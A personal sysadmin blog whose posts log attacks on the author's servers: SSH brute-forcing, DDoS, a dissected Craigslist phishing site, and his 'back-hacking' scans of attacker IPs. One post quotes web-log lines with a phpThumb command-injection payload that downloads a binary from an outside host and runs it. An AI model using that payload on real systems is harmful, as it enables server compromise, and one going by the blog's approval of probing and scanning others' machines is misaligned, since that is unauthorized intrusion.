Back-Hacker Blog

Back-Hacker Blog

The Back-Hacking Blog came into existence around December 2011 after I started using Kali Linux. It comes from the idea of defending against hackers in a manner similar to Krav Maga. The putative system or security administrator doesn't just sit there passively receiving attacks, rather in the background they start probing the intruder's system, looking for weaknesses and exploits and using all of the tools available. However, make sure you read that first Back-Hacking link (and this one). There are legal, ethical and logistical questions to be addressed. Sometimes it is quite effective, as related in SunTrust Spoof: Additional ways of protecting your SunTrust access it can be quite effective. The other side of the coin is that it is not for the uninitiated. You may compromise your systems, open yourself or your organization to legal liability or criminal prosecution depending on your jurisdiction, and/or straight up waste your time. My personal position is that it is like carrying a concealed weapon, to be used only justifiably in self-defense.

AlReaud Sun, 11/13/2016 - 14:17
Tags

Very Quiet on the Server Front

Very Quiet on the Server Front

NOTE: Updated 11/15/2016

Unusually so, actually. Some of the methods may be working. Attack vectors cycle through periodically, some brute forcing the root, some brute forcing non-existent accounts. I still haven't figured out how to trap the password strings coming in on the brute forcing. Majority of attacks last week from CN, then US.

The activity has changed to the on-line servers, where I occasionally get DOS attacks. The GoDaddy servers throttle down if they sense one going on, but sometimes mistake valid activity for a DOS attack. All that takes latency to a 3-7 second level, which is OK as long as it stays on the lower end.

A new tool that I'm learning is Metasploit. An excellent penetration testing tool, but with a fairly steep learning curve. Maybe one of these days I'll make enough money to buy the pro version…

AlReaud Tue, 01/10/2012 - 22:21

Disecting a Spoof Craigs List Email

Disecting a Spoof Craigs List Email

NOTE: Updated 11/15/2016

Today's blog entry will cover a little live action. This is a continuation of the attacks from French domains. Contrary to popular belief, all online attacks DO NO ORIGINATE FROM CHINA!

Following the receipt of the below email, I examined the email in detail (clicking on the image opens a full size image in another tab or window).

Craigs List phishing email attempting to get your login.

The most important above is that when you hover over the link, you can see in the status bar that it does not send you to the link displayed, but to a bogus link. Thunderbird picks up on this and flags the message as a possible scam message.

The IP address of this link is 94.23.22.118, and is a Plesk virtual machine on a cloud node. Attacks from that area have been ongoing for weeks... Zenmap indicates that it has the signature of a compromised machine, including all common mail ports open, such as Postfix smtpd, Courier pop3d, Courier imapd, with three distinct security certificates for three different organizations. Zenmap gives that bomb symbol, LOL! The Zenmap scan is long duration and stealthy to prevent the quarry from bolting, just like if you were tracking a deer.

Following through the link takes you to [http://]accounts.craigslist.org.user.login.qpef.craigslist-auth.info, which is a sub-domain of the same offending domain. What's interesting is the slick social engineering tool they use. It's in plain view, but they sucker you into accepting it (clicking on the image opens a full size image in another tab or window).

Craigs List account login phishing scam example.

First off, we see that plainly, the WARNING: tells one what to look for. So if one just looks into the address bar, one can see that it DOESN'T match the one in the warning. Paying attention will save your ass. Two scripts are indicated as being blocked. Those are the ones that they "borrow" from the actual true site. Another indication is that the site is not locked. There is no lock symbol or other indication that it is a secure (https) site. Again reading the warning will insure that this scam doesn't work for you.

The body is pretty slick also, almost copying verbatim the actual site, and one actually does post to login.php. however, not to https://accounts.craigslist.org/login

Firebug analysis of Craigs List phishing site code

Giving it bogus information sends one to http://www.craigslist.org/about/help/user_accounts. Making one think that it was a glitch at the server.

Shutting down this kind of site externally is hard. Because it relies on the cloud, it has a lot of power, and is therefore not subject to methods such as siege. However, there are significant weaknesses, as related by previous OpenVAS scans of the same IP area. We've previously scanned 94.23.205.180, a CMS attacker IP, and found 16 high level security issues. On this domain, OpenVAS reports seven high and five medium level weaknesses. One allows access to be gained to random user accounts. No wonder phishing mail is coming from this address!

As the sysops in that domain block (94.23.0.0/16) apparently can't or won't shut down those compromised virtual machines, I put these out. As the economy has gotten worse and individuals are becoming desperate for work, these kinds of scams keep popping up more and more.

AlReaud Tue, 12/27/2011 - 09:29

Punishment DDOS attacks on online server

Punishment DDOS attacks on online server

NOTE: Updated 11/15/2016

Attacks have ceased pretty much on the testing server, but I must have pissed somebody off last night. WOOT!

DDOS attacks started in the late evening, starting probably around 21:00 through at least probably midnight. Can't actually tell because I can't access the httpd logs. The positive note is this lead to me asking GoDaddy where the httpd logs are, something I wasn't aware of (in FTP Manager). Bluehost allow access to the server logs, but Yahoo did not when I used them. It's a virtual machine so the logs don't compromise any hosting provider confidential data...

The offending IP addresses were:

  • 91.121.170.124 - FR, I know the bot-net there, and they have been getting inverse “Pavlovian Dog” training. I am almost willing to bet the control node resides in this general IP area, for at least one worldwide bot-net. Some of the addresses they control are:
  • 77.68.38.175 - UK
  • 121.254.168.13 -  KR
  • 202.43.99.159 - JP

The attack vector is overloading the CMS requesting non-existent tiny_mce. Script-kiddie shit, LOL.

I'm beginning to think I need my own bot-net, based on the idea of the Seawolf class submarines…wink

AlReaud Sat, 12/24/2011 - 08:16

Rise of the Machine. A week of wetware against bots...

Rise of the Machine. A week of wetware against bots...

Note: Updated 11/13/2016

A very interesting week in the wetware vs. botware wars. Patterns and common vulnerabilities are starting to come out of obscurity. New attack vectors have presented themselves. Indeed exciting times, LOL. cheeky

One of the most interesting, attack wise, comes from France and Malaysia. It appears to be a CMS scan, but I don't believe it is. It may be one of the first denial of service reflection attacks. There are embedded bash shell commands in the query string that are directed at specific sites that aren't my IP. I've included two samples below:

 161.139.195.191 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20
-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;c
hmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602

161.139.195.191 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]
=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk
/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 403 14168

Don't waste your time, folks, I penetration test my own systems regularly for weaknesses, and proxy service is turned off. Drupal is also very well protected, BTW. Your rewards for going there are 403's and backtracking… So that's one of the new vectors.

The other interesting proposition was getting these from two countries going in opposite directions. Tracerouting to 161.139.195.191 actually terminates at 161.139.144.4, but now terminates at:
$ traceroute 161.139.195.191
18  ge-0-0-0.glsfb02.ipe.time.net.my (211.25.27.42)

When this was scanned with zenmap, observe were traceroute terminates (click on image to get full resolution version).

Reduced size zenmap of attacker IP.

It's one of the strangest maps I have had the displeasure to view. Again, this week was a virtual tour of the world, LOL! Contacted a hospital in China, because I don't want to be disabling hospital systems because of compromised security at their end.

Common patterns:

  • HTTP TRACE enabled.
  • All or almost all mail ports open (POP, IMAP, etc.)
  • Undefined ports open.
  • Many mails servers with nothing but a control panel login.
  • Most importantly: Almost 100% LINUX SYSTEMS. This is concerning because it means, IMHO, that the configuration has become too complex for most users to securely configure. The 'nix systems can be the most secure when open to the Internet, but if I'm finding this datum, that means that most compromised systems have been mis-configured allowing bot intrusion.

I have the zenmaps, and redacted secure and httpd logs available for research purposes if anybody is interested. Just contact me at alreaud@happycattech.com.

AlReaud Fri, 12/23/2011 - 10:12

Persistent attacks from one IP in India

Persistent attacks from one IP in India

NOTE: Updated 11/15/2016

Today's memorable entry is from Trivandrum Kerala, India, in the State of Delhi: 117.243.250.249

They are memorable because for some reason fail2ban didn't trap them. So they got to attack the shell 495 times instead on the nominal five. Zenmap indicates an unusual setup, with some open ports that are normally filtered, and things not normally seen, such as ipp, wpgs, route, and sip. An unknown port is open at 20717.

OpenVAS reports 14 low level weaknesses,  with a server running at port 631. The interpretation of that is that the hacking is intentional, because without weakness present, it somewhat eliminates unintentional bots, as with the Church last week. Most of the systems examined so far have certain weaknesses present, such as http TRACE. This IP is clean of even moderate weaknesses.

Makes one wonder why they waste their time. The password on the shell is not going to be weak enough to be hack-able from the Internet, do you think? cheeky

Three sample attacks:
Dec 12 05:47:xx HCTSERVER unix_chkpwd[6306]: password check failed for user (root)
Dec 12 05:47:xx HCTSERVER sshd[6304]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.243.250.249  user=root
Dec 12 05:47:xx HCTSERVER sshd[6304]: Failed password for root from 117.243.250.249 port 18596 ssh2
Dec 12 12:47:xx HCTSERVER sshd[6305]: Received disconnect from 117.243.250.249: 11: Bye Bye
Dec 12 05:47:xx HCTSERVER unix_chkpwd[6311]: password check failed for user (root)
Dec 12 05:47:xx HCTSERVER sshd[6309]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.243.250.249  user=root
Dec 12 05:47:xx HCTSERVER sshd[6309]: Failed password for root from 117.243.250.249 port 21460 ssh2
Dec 12 12:47:xx HCTSERVER sshd[6310]: Received disconnect from 117.243.250.249: 11: Bye Bye
Dec 12 05:47:xx HCTSERVER unix_chkpwd[6314]: password check failed for user (root)
Dec 12 05:47:xx HCTSERVER sshd[6312]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.243.250.249  user=root
Dec 12 05:47:xx HCTSERVER sshd[6312]: Failed password for root from 117.243.250.249 port 23847 ssh2
Dec 12 12:47:xx HCTSERVER sshd[6313]: Received disconnect from 117.243.250.249: 11: Bye Bye

The offending IP is owned by:
route:               117.243.240.0/20
descr:               BSNL Internet
country:            IN
origin:               AS9829
mnt-lower:       MAINT-IN-DOT
mnt-routes:      MAINT-IN-DOT
mnt-by:            MAINT-IN-AS9829
changed:          dnw_jtotech@bsnl.in 20070914

role:              NS Cell
address:        Internet Cell
address:        Bharat Sanchar Nigam Limited address: 8th Floor,148-B Statesman House
address:        Barakhamba Road, New Delhi - 110 001
country:        IN
phone:          +91-11-23734057
phone:          +91-11-23710183
fax-no:          +91-11-23734052
e-mail:           hostmaster@sancharnet.in
e-mail:           abuse@bsnl.in
admin-c:        CGMD1-AP
tech-c:           DT197-AP
nic-hdl:          NC83-AP
mnt-by:         MAINT-IN-DOT
changed:       dnwplg@sancharnet.in 20030120
changed:       hm-changed@apnic.net 20071227

 

AlReaud Mon, 12/12/2011 - 08:10

Sea Change in Attack Vectors

Sea Change in Attack Vectors

NOTE: Updated 11/15/2016

There's been a sea change in the attack vectors coming into the testing server, and some interesting characters.

For approximately two weeks, we've been subject to "IP Agile" attacks. The term "IP Agile" is something borrowed from a piece of high end R&D lab equipment, a Fluke frequency-agile signal generator. The "IP Agile" attackers use numerous IP addresses that repeat only occasionally over a span of hours, evading tools like fail2ban. There also seems to be a specific cycle through countries, China, Brazil, Japan, EU (UK or France),  Taiwan, then repeating, though I don't yet have enough data.

This set of attackers seems to be hitting mail servers and phone branch exchange (PBX) servers mostly. Found a great site at a church in Lafayette, IN that had their website infested. The trick was that you only saw the spam if you had javascripts disabled. Called them up and spoke to a parishioner manning the phones, and followed up with an email.

That attack vector seems to have gone back to the normal one, which is fast hitting the secure shell hoping to evade log analysis applications. The hit rate averages 3 seconds per, and they get five tries.

One of the interesting characters from yesterday was from an IP address identified as belonging to the US DOD. Please don't tell me that attack bots are running out of DOD computers somewhere. I'm not too worried though, as I did participate in that Shredder Challenge and commented on it. But I didn't back-hack too far there, just in case… wink

Today's resolved hackers (ssh or awstats):

  • cp.trixbox.com
  • 200.169.74.156
  • www.dol-in.org/ (contacted these guys, they fixed it within the houryes).
  • www.arcuspro.fr
  • dsn2.pavianetwork.com (85.88.195.35)
AlReaud Thu, 12/08/2011 - 12:29